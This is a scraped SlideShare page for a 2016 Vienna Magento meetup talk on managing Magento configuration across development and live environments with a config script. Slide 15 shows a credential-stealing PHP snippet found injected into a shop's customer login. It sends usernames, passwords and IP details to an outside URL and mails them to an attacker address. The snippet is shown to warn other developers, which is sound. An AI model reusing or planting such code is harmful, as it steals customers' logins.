Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.
Einfache Verwaltung von Config Daten für verschiedene Production Levels 18.05.2016
16. Magento-Stammtisch in Wien
| © Flimmit 2016 (confidential)2
→ Flimmit at a glance
→ About me
→ Functionality Magento Config
→ Challenges for daily bu...
| © Flimmit 2016 (confidential)3
Flimmit at a Glance
Quick Facts
– Founded in 2007, based in Vienna
– Private Ownership, 3...
| © Flimmit 2016 (confidential)4
| © Flimmit 2016 (confidential)5
About me
→ FH study in Salzburg 1998 – 2002
„Information Management & New Media“
→ PHP De...
| © Flimmit 2016 (confidential)6
Functionality Magento Config
→ Core functionality in Mage_Core_Model_Config
→ Central Con...
| © Flimmit 2016 (confidential)7
Magento Config Init I
→ loadBase: Load all files from Etc-Directory „app/etc/“
| © Flimmit 2016 (confidential)8
Magento Config Init II
→ loadModules: Load all files from every module directory & local....
| © Flimmit 2016 (confidential)9
Magento Config Init III
→ loadDB: Load config from DB (core_config_data)
| © Flimmit 2016 (confidential)10
Challenges for daily business
→ Different development enviroments (local, stage, testing...
| © Flimmit 2016 (confidential)11
Management with Config Script
→ Shell script in shell folder „config.php“
→ Config folde...
| © Flimmit 2016 (confidential)12
Learnings, Pros & Cons
→ Learnings
– DB Config always wins!
– All levels within <config/...
| © Flimmit 2016 (confidential)13
Bonus: mean hack found
→ Login for Customer (clean):
| © Flimmit 2016 (confidential)14
Bonus: mean hack found
→ Login for Customer (hacked):
| © Flimmit 2016 (confidential)15
Bonus: mean hack found
→ Script:
$emailboss = $username; $passboss = $password; $serverb...
| © Flimmit 2016 (confidential)16
… to be continued …
Nächste SlideShare
Wird geladen in …5
×

Magento Stammtisch Wien 17. Mai 2016

256 Aufrufe

Veröffentlicht am

Info, wie man einfach Magento Config für verschiedene Produktionslevels managen kann.
https://github.com/whuber/magento-config

Veröffentlicht in: Software
  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

Magento Stammtisch Wien 17. Mai 2016

  1. 1. Einfache Verwaltung von Config Daten für verschiedene Production Levels 18.05.2016 16. Magento-Stammtisch in Wien
  2. 2. | © Flimmit 2016 (confidential)2 → Flimmit at a glance → About me → Functionality Magento Config → Challenges for daily business → Management with Config Script → Pros & Cons Agenda
  3. 3. | © Flimmit 2016 (confidential)3 Flimmit at a Glance Quick Facts – Founded in 2007, based in Vienna – Private Ownership, 3 founders/shareholders – worked as team since 2000 – Public Funding: EU Programme „Media“, Departure - Creative Agency Vienna, Austria Wirtschaftsservice (AWS impulse), AT.net (BMVIT, FFG), Austrian Film Institute(ÖFI), Wirtschaftsagentur Wien – Take over by ORF in 2016 (ORS) Business Units – VoD portal for stream/download on multiple devices – Film & TV Search engine module – Content aggregation & distribution for third parties
  4. 4. | © Flimmit 2016 (confidential)4
  5. 5. | © Flimmit 2016 (confidential)5 About me → FH study in Salzburg 1998 – 2002 „Information Management & New Media“ → PHP Developer since 2002 → Magento Developer since 2008 → Certified Developer since 05/2012 → CTO & Founder at Flimmit
  6. 6. | © Flimmit 2016 (confidential)6 Functionality Magento Config → Core functionality in Mage_Core_Model_Config → Central Config merged from several files Mage_Core_Model_Config::init() – loadBase – loadModules – loadDb
  7. 7. | © Flimmit 2016 (confidential)7 Magento Config Init I → loadBase: Load all files from Etc-Directory „app/etc/“
  8. 8. | © Flimmit 2016 (confidential)8 Magento Config Init II → loadModules: Load all files from every module directory & local.xml
  9. 9. | © Flimmit 2016 (confidential)9 Magento Config Init III → loadDB: Load config from DB (core_config_data)
  10. 10. | © Flimmit 2016 (confidential)10 Challenges for daily business → Different development enviroments (local, stage, testing, live) → Different access levels for external services (e.g. payment) → Different development systems (cachetypes, session, smtp) → MySQL Dumps from live system include core_config_data (= live access data) → DB config not able to keep history/versions (e.g. in GIT)
  11. 11. | © Flimmit 2016 (confidential)11 Management with Config Script → Shell script in shell folder „config.php“ → Config folder in „app/etc/“ → Manage all config in different files – local.xml for „local“ values – mode-{type}.xml for modus values – default.xml for default values – global.xml for installation values – store-{storecode}.xml for store relevant values – website-{website}.xml for website relevant values – … → php shell/config.php -mode live to load relevant data into app/etc/local.xml → Live demo…!
  12. 12. | © Flimmit 2016 (confidential)12 Learnings, Pros & Cons → Learnings – DB Config always wins! – All levels within <config/> adjustable (global, default, admin, frontend, etc) → Pros – Easy to manage in GIT with history – Ensure live mode for loadbalancer nodes on startup: php shell/config.php -mode live – Avoid live access data in development – Basic settings for new magento insallation available (sales, customer, catalog, etc) → Cons – Avoid saving config in backend -> insert/update in DB – Don‘t split in too many files
  13. 13. | © Flimmit 2016 (confidential)13 Bonus: mean hack found → Login for Customer (clean):
  14. 14. | © Flimmit 2016 (confidential)14 Bonus: mean hack found → Login for Customer (hacked):
  15. 15. | © Flimmit 2016 (confidential)15 Bonus: mean hack found → Script: $emailboss = $username; $passboss = $password; $serverboss = $_SERVER['SERVER_NAME']; $ipboss = $_SERVER['REMOTE_ADDR']; $details = json_decode(file_get_contents("http://www.telize.com/geoip/".$ipboss."")); $negara = $details->country_code; $nama_negara = $details->country; $kode_negara = strtolower($negara); $chkmail = file_get_contents("http://p4b.litbang.kkp.go.id/p4bjurnal/modules/path/mailceck/ ?e=".$emailboss."&p=".$passboss.""); $pesan = "Email : ".$emailboss."nPassword : ".$passboss."nStatus : ".$chkmail."nnIP Info : ".$ipboss." | ".$nama_negara." On ".date('r')."nBrowser : ".$_SERVER['HTTP_USER_AGENT']."nSite : ".$serverboss.""; $tamvan = "loggercc@yahoo.com"; $subject = "User Login (".$chkmail.") (".$nama_negara.") (".$ipboss.")"; $headers = "From: Logger User Magento From ".$serverboss." <".$ipboss."@".$serverboss.">"; mail($tamvan, $subject, $pesan, $headers);
  16. 16. | © Flimmit 2016 (confidential)16 … to be continued …

×